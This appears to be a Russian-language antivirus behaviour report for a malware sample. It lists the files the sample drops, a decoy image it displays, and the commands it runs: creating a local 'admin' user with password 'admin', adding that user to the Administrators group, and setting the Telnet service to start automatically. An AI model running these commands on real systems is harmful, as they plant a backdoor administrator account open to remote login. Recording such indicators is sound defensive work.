Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- %TEMP%\nsh2.tmp
- %TEMP%\nsb3.tmp\System.dll
- %APPDATA%\1337\itk1.jpg
- %APPDATA%\1337\telnet.exe
- %TEMP%\4.tmp\5.bat
- %TEMP%\nsb3.tmp\System.dll
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''
- '%APPDATA%\1337\telnet.exe'
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %APPDATA%\1337\itk1.jpg
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\4.tmp\5.bat" "%APPDATA%\1337\telnet.exe""
- '<SYSTEM32>\chcp.com' 1251
- '<SYSTEM32>\net.exe' user admin admin /add
- '<SYSTEM32>\net1.exe' user admin admin /add
- '<SYSTEM32>\net.exe' localgroup Администраторы admin /add
- '<SYSTEM32>\net1.exe' localgroup Администраторы admin /add
- '<SYSTEM32>\sc.exe' config tlntsvr start= auto